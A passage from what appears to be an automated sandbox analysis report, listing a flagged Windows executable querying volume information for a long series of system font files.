          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
